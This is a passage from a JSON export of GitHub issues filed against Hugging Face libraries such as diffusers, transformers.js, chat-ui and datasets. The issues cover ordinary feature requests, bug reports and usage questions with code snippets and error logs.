slow.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/b9e2f886cd6e9182f1bf1bf7421c6363956f94c5/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L149\r\n\r\n**Describe alternatives you've considered.**\r\nI've changed the code as follows:\r\n\r\n```python\r\n# huggingface code\r\ndef index_for_timestep(self, timestep, schedule_timesteps=None):\r\n if schedule_timesteps is None:\r\n schedule_timesteps = self.timesteps\r\n\r\n indices = (schedule_timesteps == timestep).nonzero()\r\n\r\n # The sigma index that is taken for the **very** first `step`\r\n # is always the second index (or the last index if there is only 1)\r\n # This way we can ensure we don't accidentally skip a sigma in\r\n # case we start in the middle of the denoising schedule (e.g. 
for image-to-image)\r\n pos = 1 if len(indices) > 1 else 0\r\n\r\n return indices[pos].item()\r\n```\r\n\r\nchanged to =>\r\n\r\n```python\r\n# my code\r\ndef index_for_timestep(self, timestep, schedule_timesteps=None):\r\n if schedule_timesteps is None:\r\n schedule_timesteps = self.timesteps\r\n\r\n num_steps = len(schedule_timesteps)\r\n start = schedule_timesteps[0].item()\r\n end = schedule_timesteps[-1].item()\r\n indices = torch.round(((timestep - start) / (end - start)) * (num_steps - 1)).long()\r\n\r\n return indices\r\n```\r\n\r\nand\r\n\r\n```python\r\n# huggingface code\r\n# self.begin_index is None when scheduler is used for training, or pipeline does not implement set_begin_index\r\nif self.begin_index is None:\r\n step_indices = [self.index_for_timestep(t, schedule_timesteps) for t in timestep]\r\n```\r\n\r\nchanged to =>\r\n\r\n```python\r\n# my code\r\n# self.begin_index is None when scheduler is used for training, or pipeline does not implement set_begin_index\r\nif self.begin_index is None:\r\n step_indices = self.index_for_timestep(timestep, schedule_timesteps)\r\n```\r\n\r\n**Additional context.**\r\nJust wanted to bring this modification to your attention since it could be a training speedup for folks. \ud83d\ude42 Especially when someone has a large batch size > 1 and this for loop is occurring with nonzero search operations. Some other small changes might be necessary to ensure compatibility of the function changes, but I suspect it could help everyone. Thanks for the consideration!\r\n", "url": "https://github.com/huggingface/diffusers/issues/9417", "state": "open", "labels": [ "help wanted", "wip", "contributions-welcome", "performance" ], "created_at": "2024-09-11T14:54:37Z", "updated_at": "2025-02-08T10:26:47Z", "comments": 11, "user": "ethanweber" }, { "repo": "huggingface/cosmopedia", "number": 29, "title": "What is the best way to cite the work?", "body": "This is absolutely fantastic work. Thank you very much for making it public. \r\n\r\nWhat is the best way to cite this dataset/project? Is there any paper I can cite or should I cite the blog-post?", "url": "https://github.com/huggingface/cosmopedia/issues/29", "state": "closed", "labels": [], "created_at": "2024-09-11T14:34:54Z", "updated_at": "2024-09-11T14:36:15Z", "user": "vijetadeshpande" }, { "repo": "huggingface/diffusers", "number": 9416, "title": "[Schedulers] Add SGMUniform", "body": "Thanks to @rollingcookies, we can see in this [issue](https://github.com/huggingface/diffusers/issues/9397) that this scheduler works great with the Hyper and probably also Lightning loras/unets.\r\n\r\nIt'd be fantastic if someone can contribute this scheduler to diffusers. 
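One caveat worth flagging on the `index_for_timestep` rewrite proposed above: the rounding trick assumes an (approximately) evenly spaced schedule, which is easy to sanity-check before adopting it; shifted or otherwise non-uniform schedules would make the two paths disagree:

```python
import torch

# Both lookups must agree on an evenly spaced (linspace) schedule.
schedule = torch.linspace(1000.0, 1.0, steps=50)
for t in schedule:
    slow = (schedule == t).nonzero()[0].item()
    fast = torch.round(
        (t - schedule[0]) / (schedule[-1] - schedule[0]) * (len(schedule) - 1)
    ).long().item()
    assert slow == fast, (slow, fast)
print("rounding lookup matches nonzero() on this schedule")
```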
\r\n\r\nPlease let me know if someone is willing to do this.", "url": "https://github.com/huggingface/diffusers/issues/9416", "state": "closed", "labels": [ "help wanted", "contributions-welcome", "advanced" ], "created_at": "2024-09-11T13:59:27Z", "updated_at": "2024-09-23T23:39:56Z", "comments": 12, "user": "asomoza" }, { "repo": "huggingface/transformers", "number": 33416, "title": "The examples in the examples directory are mostly for fine-tuning pre-trained models\uff1fhow to train from scratch", "body": "### Model description\n\nno \n\n### Open source status\n\n- [X] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/33416", "state": "open", "labels": [ "New model" ], "created_at": "2024-09-11T03:32:53Z", "updated_at": "2024-10-03T23:28:42Z", "user": "zc-Chao" }, { "repo": "huggingface/diffusers", "number": 9407, "title": "callback / cannot yield intermediate images on the fly during inference", "body": "Hi, \r\n\r\nApologies in advance if this has been asked already, or if I'm just misusing the diffusers API.\r\n\r\nUsing `diffusers==0.30.2`\r\n\r\n**What API design would you like to have changed or added to the library? Why?**\r\n\r\nI will illustrate straight away the general issue with my use case: I need to call a (FLUX) diffusers pipeline from some endpoint of mine, passing a callback that decodes latents and saves on disk intermediate images obtained from them, at the end of each step. So far, so good: I do manage to get the intermediate images saved on disk. I do this using the pipeline argument `callback_on_step_end`.\r\n\r\nNow, I'd like to _**yield**_ (in the pythonic meaning) these intermediate images on the fly, as soon as they're available, i.e. at the end of each inference step. I need to do so from my endpoint. That's where my problem is.\r\n\r\nI could not make this idea work using the diffusers callback mechanism.\r\nI mean, I did manage that by subclassing the pipeline, copy-pasting the dunder call method code and overriding it, but this is not maintainable, especially since the FLUX code evolves rapidly nowadays.\r\nAlso, note that currently diffusers assigns the result of the call to the callback to a variable and expects it to implement the `.pop` method, which might add constraints (diffusers typically expects a kwarg dict, see [here](https://github.com/huggingface/diffusers/blob/v0.30.2/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L1026)).\r\n\r\nAnother approach I thought of is to monitor the disk contents in a parallel process during the call to the pipeline.\r\n\r\nBut is there an easier way?\r\n\r\n\r\n\r\n**What use case would this enable or better enable? 
Can you give us a code example?**\r\n\r\n\r\nThis allows to manipulate the objects produced by the callback live, instead of having to wait for the whole reverse diffusion to finish.\r\n\r\n\r\nThank you\r\n\r\ncc @sayakpaul @yiyixuxu\r\n\r\nalso tagging @asomoza since I saw he is the contributor to the official callback interface\r\n", "url": "https://github.com/huggingface/diffusers/issues/9407", "state": "closed", "labels": [], "created_at": "2024-09-10T16:32:04Z", "updated_at": "2024-09-25T12:28:20Z", "comments": 8, "user": "Clement-Lelievre" }, { "repo": "huggingface/transformers.js", "number": 928, "title": "The inference speed on the mobile end is a bit slow", "body": "### Question\r\n\r\nIf it is a mobile device that does not support WebGPU, how can we improve the inference speed of the model? I have tried WebWorker, but the results were not satisfactory", "url": "https://github.com/huggingface/transformers.js/issues/928", "state": "open", "labels": [ "question" ], "created_at": "2024-09-10T09:14:16Z", "updated_at": "2024-09-11T08:46:33Z", "user": "Gratifyyy" }, { "repo": "huggingface/transformers.js", "number": 927, "title": "Error with Using require for ES Modules in @xenova/transformers Package", "body": "### Question\n\ntrying to use require to import the Pipeline class from the @xenova/transformers package, but encounter the following error:\r\n\r\nconst { Pipeline } = require('@xenova/transformers');\r\n^\r\n\r\nError [ERR_REQUIRE_ESM]: require() of ES Module D:\\Z-charity\\dating_app_backend\\node_modules@xenova\\transformers\\src\\transformers.js from D:\\Z-charity\\dating_app_backend\\controllers\\authController.js not supported.\r\nInstead change the require of transformers.js in D:\\Z-charity\\dating_app_backend\\controllers\\authController.js to a dynamic import() which is available in all CommonJS modules.\r\nat Object. (D:\\Z-charity\\dating_app_backend\\controllers\\authController.js:10:22) {\r\ncode: 'ERR_REQUIRE_ESM'\r\n\r\nIssue with Dynamic Import\r\n\r\nconst getPipeline = async () => {\r\nconst { Pipeline } = await import('@xenova/transformers');\r\nreturn new Pipeline('text-classification', 'xenova/bert-base-uncased');\r\n};\r\n\r\n{\r\n\"message\": \"Server error\",\r\n\"error\": \"Must implement _call method in subclass\"\r\n}\r\n\r\nReproduction\r\ntrying to use require to import the Pipeline class from the @xenova/transformers package, but encounter the following error:\r\n\r\nconst { Pipeline } = require('@xenova/transformers');\r\n^\r\n\r\nError [ERR_REQUIRE_ESM]: require() of ES Module D:\\Z-charity\\dating_app_backend\\node_modules@xenova\\transformers\\src\\transformers.js from D:\\Z-charity\\dating_app_backend\\controllers\\authController.js not supported.\r\nInstead change the require of transformers.js in D:\\Z-charity\\dating_app_backend\\controllers\\authController.js to a dynamic import() which is available in all CommonJS modules.\r\nat Object. 
(D:\\Z-charity\\dating_app_backend\\controllers\\authController.js:10:22) {\r\ncode: 'ERR_REQUIRE_ESM'\r\n\r\nIssue with Dynamic Import\r\n\r\nconst getPipeline = async () => {\r\nconst { Pipeline } = await import('@xenova/transformers');\r\nreturn new Pipeline('text-classification', 'xenova/bert-base-uncased');\r\n};\r\n\r\n{\r\n\"message\": \"Server error\",\r\n\"error\": \"Must implement _call method in subclass\"\r\n}\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/927", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-10T06:02:53Z", "updated_at": "2024-12-08T19:17:31Z", "user": "qamarali205" }, { "repo": "huggingface/transformers.js", "number": 925, "title": "V3 - WebGPU Whisper in Chrome Extention", "body": "### Question\n\nCan [webGPU accelerated whisper](https://huggingface.co/spaces/Xenova/whisper-webgpu) run in a chrome extension?\r\n\r\nI checked the space and found the dependency `\"@xenova/transformers\": \"github:xenova/transformers.js#v3\"` which I imported in a chrome extension. When I tried to import it, it didn't work.\r\n\r\n```\r\nModule not found: Error: Can't resolve '@xenova/transformers' in 'D:\\projects\\mosaic8\\browser-extension\\src\\utils' \r\nresolve '@xenova/transformers' in 'D:\\projects\\mosaic8\\browser-extension\\src\\utils'\r\n Parsed request is a module\r\n using description file: D:\\projects\\mosaic8\\browser-extension\\package.json (relative path: ./src/utils)\r\n Field 'browser' doesn't contain a valid alias configuration\r\n resolve as module\r\n D:\\projects\\mosaic8\\browser-extension\\src\\utils\\node_modules doesn't exist or is not a directory\r\n D:\\projects\\mosaic8\\browser-extension\\src\\node_modules doesn't exist or is not a directory\r\n D:\\projects\\mosaic8\\browser-extension\\node_modules doesn't exist or is not a directory\r\n looking for modules in D:\\projects\\mosaic8\\node_modules\r\n single file module\r\n using description file: D:\\projects\\mosaic8\\package.json (relative path: ./node_modules/@xenova/transformers)\r\n no extension\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers is not a file\r\n .ts\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.ts doesn't exist\r\n .tsx\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.tsx doesn't exist\r\n .js\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.js doesn't exist\r\n .jsx\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.jsx doesn't exist\r\n existing directory D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\r\n using description file: D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\package.json (relative path: .)\r\n using exports field: ./dist/transformers.js\r\n using description file: D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\package.json (relative path: ./dist/transformers.js)\r\n no extension\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js doesn't exist\r\n .ts\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.ts doesn't exist \r\n .tsx\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.tsx doesn't 
exist \r\n .js\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.js doesn't exist \r\n .jsx\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.jsx doesn't exist \r\n as directory\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js doesn't exist\r\n```\r\n\r\nI might be doing something I don't know maybe. What could the issue here be?\r\n\r\nWhat I can understand is that it is trying to search for a ts/tsx/js/jsx file (as specified in the `webpack.config.js` and it is unable to get it.", "url": "https://github.com/huggingface/transformers.js/issues/925", "state": "open", "labels": [ "question" ], "created_at": "2024-09-10T02:52:41Z", "updated_at": "2025-01-18T16:03:26Z", "user": "chandeldivyam" }, { "repo": "huggingface/diffusers", "number": 9402, "title": "[Flux ControlNet] Add img2img and inpaint pipelines", "body": "We recently added img2img and inpainting pipelines for Flux thanks to @Gothos contribution. \r\n\r\nWe also have controlnet support for Flux thanks to @wangqixun.\r\n\r\nIt'd be nice to have controlnet versions of these pipelines since there's been requests to have them.\r\n\r\nBasically, we need to create two new pipelines that add the controlnet support from this [pipeline ](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_controlnet.py) to the corresponding pipellines.\r\n\r\n- [X] [Image to image](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_img2img.py)\r\n- [X] [Inpaint](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_inpaint.py)\r\n\r\nRelated issue: #9158 \r\n\r\nLet me know if someone is interested in contributing this.", "url": "https://github.com/huggingface/diffusers/issues/9402", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-09-10T02:08:32Z", "updated_at": "2024-10-25T02:22:19Z", "comments": 11, "user": "asomoza" }, { "repo": "huggingface/transformers.js", "number": 924, "title": "Steps for suppressing strings", "body": "### Question\n\nWhat is the syntax for suppressing strings from showing up in the output text? Should I be doing that in my code, or is there a config option for it? I'm trying to remove everything that isn't a word:\r\n```\r\nconst suppressedStrings = [\r\n \"[BLANK_AUDIO]\",\r\n \"[CLEARS THROAT]\",\r\n \"[Coughing]\",\r\n \"[inaudible]\",\r\n \"[MUSIC]\",\r\n \"[MUSIC PLAYING]\",\r\n \"[Pause]\",\r\n \"(keyboard clicking)\",\r\n];\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/924", "state": "open", "labels": [ "question" ], "created_at": "2024-09-09T21:44:16Z", "updated_at": "2025-01-24T17:53:47Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9395, "title": "[Q] Possibly unused `self.final_alpha_cumprod`", "body": "Hello team, quick question to make sure I understand the behavior of the `step` function in LCM Scheduler.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/a7361dccdc581147620bbd74a6d295cd92daf616/src/diffusers/schedulers/scheduling_lcm.py#L534-L543\r\n\r\nHere, it seems that the condition `prev_timestep >= 0` is always `True`, because `timestep` and `self.timesteps[prev_step_index]` cannot be negative. This would mean that `self.final_alpha_cumprod` is never used. 
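For contrast, the DDIM-style schedulers that use the same guard compute the previous timestep by subtraction, and there it genuinely goes negative on the final step, which is the case `final_alpha_cumprod` covers; a small arithmetic sketch:

```python
# DDIM-style previous-timestep arithmetic (not LCM's index-based lookup).
num_train_timesteps, num_inference_steps = 1000, 50
step_ratio = num_train_timesteps // num_inference_steps       # 20
timesteps = list(range(0, num_inference_steps * step_ratio, step_ratio))[::-1]
print(timesteps[:2], timesteps[-1])                           # [980, 960] 0
print(timesteps[-1] - step_ratio)                             # -20 -> final_alpha_cumprod branch
```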
Is there a way in which `prev_timestep` can be negative?", "url": "https://github.com/huggingface/diffusers/issues/9395", "state": "open", "labels": [ "stale" ], "created_at": "2024-09-09T17:35:08Z", "updated_at": "2024-11-09T15:03:23Z", "comments": 7, "user": "fdtomasi" }, { "repo": "huggingface/chat-ui", "number": 1458, "title": "Chat ui sends message prompt 404", "body": "```\r\nMONGODB_URL='mongodb://localhost:27017'\r\nPLAYWRIGHT_ADBLOCKER='false'\r\nMODELS=`[\r\n {\r\n \"name\": \"Local minicpm\",\r\n \"tokenizer\": \"minicpm\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\": \"{{preprompt}}{{#each messages}}{{#ifUser}}<|user|>\\n{{content}}<|end|>\\n<|assistant|>\\n{{/ifUser}}{{#ifAssistant}}{{content}}<|end|>\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"stop\": [\"<|end|>\", \"<|endoftext|>\", \"<|assistant|>\"],\r\n \"temperature\": 0.7,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 3071\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"***/v1/chat/completions\",\r\n \"defaultHeaders\": {\r\n \"x-portkey-config\": '{ \"Authorization\": \"Bearer apikey\" }'\r\n }\r\n }],\r\n },\r\n]`\r\n```\r\nPrompt for the following error\uff1a\r\n\r\n```\r\nERROR (15839): 404 status code (no body)\r\n err: {\r\n \"type\": \"NotFoundError\",\r\n \"message\": \"404 status code (no body)\",\r\n \"stack\":\r\n Error: 404 status code (no body)\r\n at APIError.generate (file:///Users/user/Desktop/chat-ui/node_modules/openai/error.mjs:50:20)\r\n at OpenAI.makeStatusError (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:268:25)\r\n at OpenAI.makeRequest (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:311:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/Users/user/Desktop/chat-ui/src/lib/server/endpoints/openai/endpointOai.ts:111:36)\r\n at async Module.generateFromDefaultEndpoint (/Users/user/Desktop/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:11:23)\r\n at async generateTitle (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/title.ts:53:10)\r\n at async Module.generateTitleForConversation (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/title.ts:16:19)\r\n \"status\": 404,\r\n \"headers\": {\r\n \"connection\": \"keep-alive\",\r\n \"content-encoding\": \"gzip\",\r\n \"content-type\": \"text/plain; charset=utf-8\",\r\n \"date\": \"Mon, 09 Sep 2024 13:29:16 GMT\",\r\n \"transfer-encoding\": \"chunked\",\r\n \"vary\": \"Accept-Encoding\"\r\n }\r\n }\r\n[21:29:16.156] ERROR (15839): 404 status code (no body)\r\n err: {\r\n \"type\": \"NotFoundError\",\r\n \"message\": \"404 status code (no body)\",\r\n \"stack\":\r\n Error: 404 status code (no body)\r\n at APIError.generate (file:///Users/user/Desktop/chat-ui/node_modules/openai/error.mjs:50:20)\r\n at OpenAI.makeStatusError (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:268:25)\r\n at OpenAI.makeRequest (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:311:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/Users/user/Desktop/chat-ui/src/lib/server/endpoints/openai/endpointOai.ts:111:36)\r\n at async Module.generate (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/generate.ts:8:30)\r\n at async textGenerationWithoutTitle (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/index.ts:62:3)\r\n \"status\": 404,\r\n \"headers\": {\r\n \"connection\": \"keep-alive\",\r\n \"content-encoding\": 
\"gzip\",\r\n \"content-type\": \"text/plain; charset=utf-8\",\r\n \"date\": \"Mon, 09 Sep 2024 13:29:16 GMT\",\r\n \"transfer-encoding\": \"chunked\",\r\n \"vary\": \"Accept-Encoding\"\r\n }\r\n }\r\n```\r\n\r\nAccessing through Postman alone is normal", "url": "https://github.com/huggingface/chat-ui/issues/1458", "state": "open", "labels": [ "support" ], "created_at": "2024-09-09T13:31:56Z", "updated_at": "2024-09-13T09:32:24Z", "comments": 2, "user": "nextdoorUncleLiu" }, { "repo": "huggingface/chat-ui", "number": 1456, "title": "could you provide an easy way to force output as json?", "body": "current I use\r\n\r\npreprompt:'only output json. Do not output anything that is not json. Do not use markdown format. Must begin with {.'\r\n\r\nBut llama is not smart enough to output json form. It always begin with Here is the JSON answer or begin with ```(markdown format) for give me unvalid json string.\r\n\r\nIt seems preprompt is not enough to force json format. Could you provide an easy way to output just json. Or maybe the method is in tools.", "url": "https://github.com/huggingface/chat-ui/issues/1456", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-09-09T11:34:17Z", "updated_at": "2024-10-06T18:35:29Z", "comments": 1, "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9392, "title": "[Scheduler] Add SNR shift following SD3, would the rest of the code need to be modified?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\n\r\nWith the increasing resolution of image or video generation, we need to introduce more noise at smaller T, such as SNR shift following SD3. I have observed that CogVideoX's schedule has already implemented [this](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_ddim_cogvideox.py#L214). If I add this line to the DDPM schedule, would the rest of the code (e.g., noise addition, sampling, etc.) need to be modified? I assume it wouldn't, but I seek a precise response.\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\n\r\n```\r\nclass DDPMScheduler(SchedulerMixin, ConfigMixin):\r\n def __init__(snr_shift_scale, **kwarg)\r\n # predefine beta and alpha\r\n self.alphas_cumprod = self.alphas_cumprod / (snr_shift_scale + (1 - snr_shift_scale) * self.alphas_cumprod)\r\n # other code\r\n # Other functions are the same as before\r\n```\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9392", "state": "open", "labels": [ "stale" ], "created_at": "2024-09-09T09:19:37Z", "updated_at": "2025-01-05T15:05:04Z", "comments": 7, "user": "LinB203" }, { "repo": "huggingface/speech-to-speech", "number": 96, "title": "How to designate Melo TTS model to use my trained model? ", "body": "Hi,\r\n\r\nI am using Melo as TTS. And I trained with my datasets. How to designate Melo (here at speech to speech) to use my model?\r\n\r\nThanks!", "url": "https://github.com/huggingface/speech-to-speech/issues/96", "state": "closed", "labels": [], "created_at": "2024-09-08T20:36:23Z", "updated_at": "2024-09-10T14:42:58Z", "user": "insufficient-will" }, { "repo": "huggingface/huggingface_hub", "number": 2526, "title": "How can I rename folders in given repo? 
I need to rename folders ", "body": "### Describe the bug\n\nI am trying to rename as below, but it fails :/\r\n\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\nimport os\r\n\r\n# Initialize the Hugging Face API\r\napi = HfApi()\r\n\r\n# Set the repository name\r\nrepo_name = \"MonsterMMORPG/3D-Cartoon-Style-FLUX\"\r\n\r\n# Define the folder renaming mappings\r\nfolder_renames = {\r\n \"Training-Checkpoints-NO-Captions\": \"Training-Checkpoints-Inconsistent-DATASET-NO-Captions\",\r\n \"Training-Checkpoints-With-Captions\": \"Training-Checkpoints-Inconsistent-DATASET-With-Captions\"\r\n}\r\n\r\n# Function to rename folders\r\ndef rename_folder(repo_name, old_name, new_name):\r\n try:\r\n api.move_folder(\r\n repo_id=repo_name,\r\n path_in_repo=old_name,\r\n new_path=new_name,\r\n commit_message=f\"Rename folder '{old_name}' to '{new_name}'\"\r\n )\r\n print(f\"Successfully renamed '{old_name}' to '{new_name}'\")\r\n except Exception as e:\r\n print(f\"Error renaming '{old_name}' to '{new_name}': {str(e)}\")\r\n\r\n# Iterate through the folder renaming mappings and rename each folder\r\nfor old_name, new_name in folder_renames.items():\r\n rename_folder(repo_name, old_name, new_name)\r\n\r\nprint(\"Folder renaming process completed.\")\r\n```\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\nlatest\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2526", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-07T17:23:54Z", "updated_at": "2024-09-09T10:49:26Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 33359, "title": "[Docs] How to build offline HTML or Docset files for other documentation viewers?", "body": "### Feature request\n\nHow can I build the docs into HTML files for use with other documentation viewers like [Dash](https://www.kapeli.com/dash), [Dash-User-Contributions](https://github.com/Kapeli/Dash-User-Contributions)?\r\n\r\nI successfully built the PyTorch docs for Dash by working directly in their `docs/` directory. I\u2019m wondering if a similar process exists for Hugging Face libraries.\n\n### Motivation\n\nThe Dash docset viewer is very useful for viewing multiple documentation sets in one place, even offline. 
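Returning to the folder-rename question above: `HfApi` has no `move_folder` method, which is why that call fails. A hedged sketch of one workable pattern, copy-then-delete in a single commit (assuming `CommitOperationCopy` applies to the files involved; historically it only supported LFS-tracked files):

```python
from huggingface_hub import HfApi, CommitOperationCopy, CommitOperationDelete

api = HfApi()
repo_id = "MonsterMMORPG/3D-Cartoon-Style-FLUX"
old_prefix = "Training-Checkpoints-NO-Captions"
new_prefix = "Training-Checkpoints-Inconsistent-DATASET-NO-Captions"

# Copy every file under the old prefix to the new prefix, then delete the
# old folder, all in one commit (the Hub has no server-side rename).
operations = [
    CommitOperationCopy(
        src_path_in_repo=path,
        path_in_repo=new_prefix + path[len(old_prefix):],
    )
    for path in api.list_repo_files(repo_id)
    if path.startswith(old_prefix + "/")
]
operations.append(CommitOperationDelete(path_in_repo=old_prefix + "/", is_folder=True))

api.create_commit(
    repo_id=repo_id,
    operations=operations,
    commit_message=f"Rename folder '{old_prefix}' to '{new_prefix}'",
)
```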
It would be great to support it and include all Hugging Face libraries.\n\n### Your contribution\n\nI\u2019ve built the PyTorch docs for Dash, so I\u2019m familiar with incorporating and generating docsets.", "url": "https://github.com/huggingface/transformers/issues/33359", "state": "closed", "labels": [ "Documentation", "Feature request" ], "created_at": "2024-09-06T15:51:35Z", "updated_at": "2024-09-10T23:43:57Z", "user": "ueoo" }, { "repo": "huggingface/transformers", "number": 33343, "title": "How to install transformers==4.45; two or three days ago I could install it successfully, but today I cannot.", "body": "### System Info\n\ntorch2.2\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\npip install git+https://github.com/huggingface/transformers.git\n\n### Expected behavior\n\nHow to install the latest transformers", "url": "https://github.com/huggingface/transformers/issues/33343", "state": "closed", "labels": [ "Installation", "bug" ], "created_at": "2024-09-06T08:23:00Z", "updated_at": "2024-10-16T08:04:10Z", "user": "HyacinthJingjing" }, { "repo": "huggingface/optimum-nvidia", "number": 149, "title": "How to use the TensorRT model converter", "body": "Referring to [src/optimum/nvidia/export/converter.py] -> class 'TensorRTModelConverter': this can 'Take a local model and create the TRTLLM checkpoint and engine'.\r\nQuestions:\r\n- What are the applicable local model formats? e.g. JAX, HuggingFace, DeepSpeed\r\n- How can this script be used on its own to generate a TRTLLM checkpoint/engine? Could you please share a tutorial, if one exists?\r\n\r\nThank you.\r\n", "url": "https://github.com/huggingface/optimum-nvidia/issues/149", "state": "open", "labels": [], "created_at": "2024-09-05T18:55:15Z", "updated_at": "2024-09-05T18:55:15Z", "user": "FortunaZhang" }, { "repo": "huggingface/datasets", "number": 7139, "title": "Using load_dataset to load imagenet-1K, but finding an empty dataset", "body": "### Describe the bug\n\n```python\r\ndef get_dataset(data_path, train_folder=\"train\", val_folder=\"val\"):\r\n traindir = os.path.join(data_path, train_folder)\r\n valdir = os.path.join(data_path, val_folder)\r\n\r\n def transform_val_examples(examples):\r\n transform = Compose([\r\n Resize(256),\r\n CenterCrop(224),\r\n ToTensor(),\r\n ])\r\n examples[\"image\"] = [transform(image.convert(\"RGB\")) for image in examples[\"image\"]]\r\n return examples\r\n\r\n def transform_train_examples(examples):\r\n transform = Compose([\r\n RandomResizedCrop(224),\r\n RandomHorizontalFlip(),\r\n ToTensor(),\r\n ])\r\n examples[\"image\"] = [transform(image.convert(\"RGB\")) for image in examples[\"image\"]]\r\n return examples\r\n\r\n # @fengsicheng: This way is very slow for big dataset like ImageNet-1K (but can pass the network problem using local dataset)\r\n # train_set = load_dataset(\"imagefolder\", data_dir=traindir, num_proc=4)\r\n # test_set = load_dataset(\"imagefolder\", data_dir=valdir, num_proc=4)\r\n\r\n train_set = load_dataset(\"imagenet-1K\", split=\"train\", trust_remote_code=True) \r\n test_set = load_dataset(\"imagenet-1K\", split=\"test\", trust_remote_code=True)\r\n\r\n print(train_set[\"label\"])\r\n\r\n train_set.set_transform(transform_train_examples)\r\n test_set.set_transform(transform_val_examples)\r\n\r\n return train_set, test_set\r\n```\r\nThe code is above, but 
the output of the print is a list of None:\r\n \r\n\"Image\"\r\n\n\n### Steps to reproduce the bug\n\n1. Just run the code \r\n2. See the print output\r\n\n\n### Expected behavior\n\nI do not know how to fix this; can anyone provide help or something? It is urgent for me.\n\n### Environment info\n\n- `datasets` version: 2.21.0\r\n- Platform: Linux-5.4.0-190-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.14\r\n- `huggingface_hub` version: 0.24.6\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7139", "state": "open", "labels": [], "created_at": "2024-09-05T15:12:22Z", "updated_at": "2024-10-09T04:02:41Z", "comments": 2, "user": "fscdc" }, { "repo": "huggingface/datasets", "number": 7138, "title": "Cache only changed columns?", "body": "### Feature request\n\nCache only the actual changes to the dataset, i.e. the changed columns.\n\n### Motivation\n\nI realized that caching actually saves the complete dataset again.\r\nThis is especially problematic for image datasets if one wants to only change another column, e.g. some metadata, and then has to save 5 TB again.\n\n### Your contribution\n\nIs this even viable in the current architecture of the package?\r\nI quickly looked into it and it seems it would require significant changes.\r\n\r\nI would spend some time looking into this, but maybe somebody could help with the feasibility and a plan for implementing it before I spend too much time on it?", "url": "https://github.com/huggingface/datasets/issues/7138", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-09-05T12:56:47Z", "updated_at": "2024-09-20T13:27:20Z", "comments": 2, "user": "Modexus" }, { "repo": "huggingface/lerobot", "number": 413, "title": "Compatible off-the-shelf 